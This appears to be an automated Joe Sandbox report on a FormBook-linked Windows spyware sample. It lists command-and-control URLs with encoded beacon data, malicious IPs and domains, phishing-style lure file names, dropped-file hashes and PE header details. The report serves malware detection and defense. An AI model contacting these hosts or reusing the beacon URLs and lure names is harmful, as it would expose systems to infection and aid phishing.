                                                                                                                            https://www.bayarcepat19.click/fxts/?5vc=KBrNmZFmj0ul2oD2qgnroh/wQ2h5AjW2d9F4abtF0F4CaovzTwTYRyu6Dyksc.exe, 00000004.00000002.4571993110.00000000045DC000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000357C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://www.gandi.net/en/domainsc.exe, 00000004.00000002.4571993110.0000000004C24000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 00000004.00000002.4571993110.00000000053FE000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000439E000.00000004.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003BC4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://www.ecosia.org/newtab/sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://kx507945.shopsc.exe, 00000004.00000002.4571993110.0000000004F48000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003EE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://ac.ecosia.org/autocomplete?q=sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.365seo.ccsc.exe, 00000004.00000002.4571993110.00000000050DA000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000407A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://whois.gandi.net/en/results?search=turbonotes.appsc.exe, 00000004.00000002.4571993110.0000000004C24000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003BC4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.crochetpets.onlineYKSXcXcWryn.exe, 00000008.00000002.4572880167.0000000005034000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.crochetpets.online/px.js?ch=2sc.exe, 00000004.00000002.4571993110.0000000005722000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 00000004.00000002.4574024269.0000000006440000.00000004.00000800.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.00000000046C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.crochetpets.online/px.js?ch=1sc.exe, 00000004.00000002.4571993110.0000000005722000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 00000004.00000002.4574024269.0000000006440000.00000004.00000800.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.00000000046C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs
                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            38.47.233.65
                                                                                                                                            nng65.topUnited States
                                                                                                                                            174COGENT-174UStrue
                                                                                                                                            156.242.132.82
                                                                                                                                            www.shanhaiguan.netSeychelles
                                                                                                                                            132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                                                                            67.223.117.189
                                                                                                                                            www.gutpox.lifeUnited States
                                                                                                                                            15189VIMRO-AS15189UStrue
                                                                                                                                            188.114.97.3
                                                                                                                                            www.bayarcepat19.clickEuropean Union
                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                            197.189.237.186
                                                                                                                                            patioprojex.africaSouth Africa
                                                                                                                                            37153xneeloZAtrue
                                                                                                                                            172.67.181.150
                                                                                                                                            www.aaavvejibej.bondUnited States
                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                            217.70.184.50
                                                                                                                                            webredir.vip.gandi.netFrance
                                                                                                                                            29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                                                                                                            208.91.197.27
                                                                                                                                            www.crochetpets.onlineVirgin Islands (BRITISH)
                                                                                                                                            40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                            3.33.130.190
                                                                                                                                            rmgltd.servicesUnited States
                                                                                                                                            8987AMAZONEXPANSIONGBtrue
                                                                                                                                            54.67.42.145
                                                                                                                                            www.kx507981.shopUnited States
                                                                                                                                            16509AMAZON-02UStrue
                                                                                                                                            45.33.18.44
                                                                                                                                            www.tempmai.lolUnited States
                                                                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                            Analysis ID:1530706
                                                                                                                                            Start date and time:2024-10-10 12:50:07 +02:00
                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 10m 52s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                            Number of analysed new started processes analysed:10
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:2
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Sample name:foljNJ4bug.exe
                                                                                                                                            renamed because original name is a hash value
                                                                                                                                            Original Sample Name:bee1b254cca057d92d1ee189f1e8b02aea25826f7be053f788c047acc4d916ab.exe
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@16/11
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 75%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 91%
                                                                                                                                            • Number of executed functions: 52
                                                                                                                                            • Number of non-executed functions: 305
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                            TimeTypeDescription
                                                                                                                                            06:51:50API Interceptor13436223x Sleep call for process: sc.exe modified
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            38.47.233.65Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.nng65.top/kpvx/?EZ2lo=qVlYuFMRm0T/H/1dN1vNUTygvewP5xPIMi2tCBBBqVz46ihG+FVn/BxKK2Kq0cGJXf1CUDwOjcd0Kop00bnWlMV60J7u8mOEgagA5oNjn1tN0dkAzg==&7NP=7FXXUPl
                                                                                                                                            DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.nng65.top/0xnc/
                                                                                                                                            RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.nng65.top/h709/
                                                                                                                                            k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.qqa84.top/2n7s/
                                                                                                                                            September Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.nng65.top/7bwx/
                                                                                                                                            PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.qqa84.top/2qp8/
                                                                                                                                            Quote #011698.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.qqa84.top/2qp8/
                                                                                                                                            yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.qqa84.top/yqrp/?EN-hu=3JBOC3Zinj9Q/QZ6nj2TBhVj6Qn2+UGmQB+gM3/kJK89ew2X04ZwSyucTT/Zg+CsqlXbhWc2C9lKXgVjyjN7XR24mfkQEmyM89v3vAFGTWijfWrLOg==&zx=TzUh
                                                                                                                                            PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.qqa84.top/2qp8/
                                                                                                                                            PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.qqa84.top/2qp8/
                                                                                                                                            156.242.132.82N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.shanhaiguan.net/b6g5/
                                                                                                                                            PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.shanhaiguan.net/p2q3/
                                                                                                                                            NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.shanhaiguan.net/p2q3/
                                                                                                                                            DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.shanhaiguan.net/p2q3/
                                                                                                                                            PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.shanhaiguan.net/p2q3/
                                                                                                                                            67.223.117.189w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.uburn.xyz/iqqs/
                                                                                                                                            enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.uburn.xyz/iqqs/
                                                                                                                                            PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.heldhold.xyz/fava/
                                                                                                                                            rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.heldhold.xyz/fava/
                                                                                                                                            Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.uburn.xyz/iqqs/
                                                                                                                                            AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.uburn.xyz/unks/
                                                                                                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.uburn.xyz/unks/
                                                                                                                                            DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.heldhold.xyz/fava/
                                                                                                                                            LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.techstone.top/d5fo/
                                                                                                                                            Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • www.nodedev.top/wnsq/
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            webredir.vip.gandi.net7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 217.70.184.50
                                                                                                                                            www.aaavvejibej.bondJsPTv7s4Fn.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 172.67.181.150
                                                                                                                                            IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 172.67.181.150
                                                                                                                                            PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 172.67.181.150
                                                                                                                                            SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                            • 172.67.181.150
                                                                                                                                            NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 172.67.181.150
                                                                                                                                            DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 172.67.181.150
                                                                                                                                            PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 104.21.31.249
                                                                                                                                            www.tempmai.lollWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 72.14.185.43
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            POWERLINE-AS-APPOWERLINEDATACENTERHKhttps://www.roblox.sc/users/294681399108/profileGet hashmaliciousUnknownBrowse
                                                                                                                                            • 154.213.192.22
                                                                                                                                            9b7dlGj5Gq.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 154.201.225.237
                                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 45.202.220.131
                                                                                                                                            MO52No4WnT.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.244.7.75
                                                                                                                                            lOR9WmVKs5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.251.7.145
                                                                                                                                            BpcC8hBhCN.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 45.202.220.157
                                                                                                                                            N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 156.242.132.82
                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.244.7.75
                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.244.7.75
                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.244.7.75
                                                                                                                                            CLOUDFLARENETUShttps://trendydigitalbuzze.com.de/YrWXF/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 188.114.97.3
                                                                                                                                            https://uk01.l.antigena.com/l/gSyI41Gz96sNln53sagX7eNcywQQOoEnYDagSj-Ka4rmvUc~~ge2uUdYhkRZf~qdeCYR20MfqPF0Cl22iQAPA~D-kwryf6JMugP38-hVRau_ADDrbJG64mdp-ZsyZX_NR5Aqy8QOMomREd_j~F2RHekIK09DCim8Shqfhw4hZXnXF1DPP7U2UTL09nH60jVmeQTVNhtpj6BYLNdVUlIVUBIDlYaiNtMQkkHjcq1woyuQdpbGd~TSAUVGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.16.119.9
                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.206.204
                                                                                                                                            https://na4.docusign.net/Signing/EmailStart.aspx?a=b4cf6218-13ec-46d9-aa5c-10723ebe7e7f&etti=24&acct=d9c705c1-5012-4d8b-98f5-b9c62798fde2&er=efa4815b-08b1-4fe7-b32f-ac28ff7e2554Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 104.17.25.14
                                                                                                                                            rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.97.3
                                                                                                                                            Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 172.67.74.152
                                                                                                                                            http://growthsparkplus.thsite.top/?email=anna@cellnextelecom.comGet hashmaliciousUnknownBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            MFSA-MiFID-APS-P2_20241007-Annex2_DOC-R-v1.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 172.67.158.46
                                                                                                                                            https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/iyada.txtGet hashmaliciousUnknownBrowse
                                                                                                                                            • 162.159.140.237
                                                                                                                                            MFSA-MiFID-APS-P2_20241003_ Submission Requirements.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 188.114.97.3
                                                                                                                                            VIMRO-AS15189USPO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 67.223.117.169
                                                                                                                                            w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 67.223.117.189
                                                                                                                                            enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 67.223.117.189
                                                                                                                                            yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 208.85.174.50
                                                                                                                                            PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 67.223.117.169
                                                                                                                                            PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 67.223.117.189
                                                                                                                                            rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 67.223.117.189
                                                                                                                                            Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 67.223.117.189
                                                                                                                                            AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 67.223.117.189
                                                                                                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 67.223.117.189
                                                                                                                                            COGENT-174USna.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 38.151.83.159
                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.86.134.165
                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 38.60.249.66
                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 38.60.249.66
                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 38.60.249.66
                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 38.139.235.128
                                                                                                                                            PAYMENT ADVISE#9879058.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 154.23.184.240
                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 38.60.249.66
                                                                                                                                            Quotation_398893.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                            • 154.38.177.76
                                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 149.95.226.175
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            Process:C:\Windows\SysWOW64\sc.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):196608
                                                                                                                                            Entropy (8bit):1.1239949490932863
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                            MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\foljNJ4bug.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):286720
                                                                                                                                            Entropy (8bit):7.9944110964574655
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:6144:PQTDobetwaAJKFxkaGzOwXKxVAYJ6n4Juc4XBQX5:I/0etYJKDk/z+X3JYc4mJ
                                                                                                                                            MD5:C189431C710BB1640DBB7EAEA65CD3C3
                                                                                                                                            SHA1:1C74E77264E93963868C5D19E014735ED6AAEC9D
                                                                                                                                            SHA-256:196DEFE89C08CD68F2DAE8F66A440815DCAD3C8F194F5FDA09829F3F281E779E
                                                                                                                                            SHA-512:A62B68D8596B3190B18E6C0391E60307B13B8C1B341DC15DBE61D0C39E63BE3646FB48AC217780EADF159A156C4215B2523B180BA8F433DB6AB796C8C21582AB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.....7L4V...H...e.Y4...gY1...ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8.SYAW(.:V.S.`.9..x.1^?.&=5^31Ue08/7X8.4*zK4>.,=y..dlY9+?.L]2aSYAY7L4/NS.|0_.n9&..,S.U...jX".C...pT1.@...%4..0T$.6(.9AP8ESYA.rL4.N[9.a..SYAY7L4V.Z;@[9NSY.]7L4VOZ9AP.QSYAI7L46KZ9A.8ECYAY5L4POZ9AP8EUYAY7L4VO:=AP:ESYAY7N4..Z9QP8USYAY'L4FOZ9AP8USYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9o$]='YAY#.0VOJ9APvASYQY7L4VOZ9AP8ESYaY7,4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VOZ9AP8ESYAY7L4VO
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.559724626406038
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:foljNJ4bug.exe
                                                                                                                                            File size:1'337'889 bytes
                                                                                                                                            MD5:7d4f32d00ec594fd95e2cd5915940bc5
                                                                                                                                            SHA1:df512f8cd6aae0abc1401f69d4bec39d65dafac2
                                                                                                                                            SHA256:bee1b254cca057d92d1ee189f1e8b02aea25826f7be053f788c047acc4d916ab
                                                                                                                                            SHA512:ef45f84a93b4ae01e2260cbb772912c90323ce7bf9f591319e42c571fbe85436649220173fd2e32cafe10d28176595bccedd5540082a28ef9e63ffabaa10d35e
                                                                                                                                            SSDEEP:24576:uRmJkcoQricOIQxiZY1iat+JJ2EzRRjnSQ160hSdex66CqB1gj1kpr8:7JZoQrbTFZY1iatiRBHAMsEgjCr8
                                                                                                                                            TLSH:7D55E122F5C68036C2A323B19E7EF769963D79370327D29727C82D215EA05816B39773
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                                                            Icon Hash:1252d232e9cc1689
                                                                                                                                            Entrypoint:0x4165c1
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:5
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:5
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:5
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                                                            Instruction
                                                                                                                                            call 00007F04B0727BABh
                                                                                                                                            jmp 00007F04B071EA1Eh
                                                                                                                                            int3
                                                                                                                                            int3
                                                                                                                                            int3
                                                                                                                                            int3
                                                                                                                                            int3
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            push edi
                                                                                                                                            push esi
                                                                                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                                                                                            mov ecx, dword ptr [ebp+10h]
                                                                                                                                            mov edi, dword ptr [ebp+08h]
                                                                                                                                            mov eax, ecx
                                                                                                                                            mov edx, ecx
                                                                                                                                            add eax, esi
                                                                                                                                            cmp edi, esi
                                                                                                                                            jbe 00007F04B071EB9Ah
                                                                                                                                            cmp edi, eax
                                                                                                                                            jc 00007F04B071ED36h
                                                                                                                                            cmp ecx, 00000080h
                                                                                                                                            jc 00007F04B071EBAEh
                                                                                                                                            cmp dword ptr [004A9724h], 00000000h
                                                                                                                                            je 00007F04B071EBA5h
                                                                                                                                            push edi
                                                                                                                                            push esi
                                                                                                                                            and edi, 0Fh
                                                                                                                                            and esi, 0Fh
                                                                                                                                            cmp edi, esi
                                                                                                                                            pop esi
                                                                                                                                            pop edi
                                                                                                                                            jne 00007F04B071EB97h
                                                                                                                                            jmp 00007F04B071EF72h
                                                                                                                                            test edi, 00000003h
                                                                                                                                            jne 00007F04B071EBA6h
                                                                                                                                            shr ecx, 02h
                                                                                                                                            and edx, 03h
                                                                                                                                            cmp ecx, 08h
                                                                                                                                            jc 00007F04B071EBBBh
                                                                                                                                            rep movsd
                                                                                                                                            jmp dword ptr [00416740h+edx*4]
                                                                                                                                            mov eax, edi
                                                                                                                                            mov edx, 00000003h
                                                                                                                                            sub ecx, 04h
                                                                                                                                            jc 00007F04B071EB9Eh
                                                                                                                                            and eax, 03h
                                                                                                                                            add ecx, eax
                                                                                                                                            jmp dword ptr [00416654h+eax*4]
                                                                                                                                            jmp dword ptr [00416750h+ecx*4]
                                                                                                                                            nop
                                                                                                                                            jmp dword ptr [004166D4h+ecx*4]
                                                                                                                                            nop
                                                                                                                                            inc cx
                                                                                                                                            add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                                            inc cx
                                                                                                                                            add byte ptr [ebx], ah
                                                                                                                                            ror dword ptr [edx-75F877FAh], 1
                                                                                                                                            inc esi
                                                                                                                                            add dword ptr [eax+468A0147h], ecx
                                                                                                                                            add al, cl
                                                                                                                                            jmp 00007F04B2B97397h
                                                                                                                                            add esi, 03h
                                                                                                                                            add edi, 03h
                                                                                                                                            cmp ecx, 08h
                                                                                                                                            jc 00007F04B071EB5Eh
                                                                                                                                            rep movsd
                                                                                                                                            jmp dword ptr [00000000h+edx*4]
                                                                                                                                            Programming Language:
                                                                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                                                                            • [C++] VS2010 SP1 build 40219
                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                            • [ASM] VS2010 SP1 build 40219
                                                                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                                                                            • [LNK] VS2010 SP1 build 40219
                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
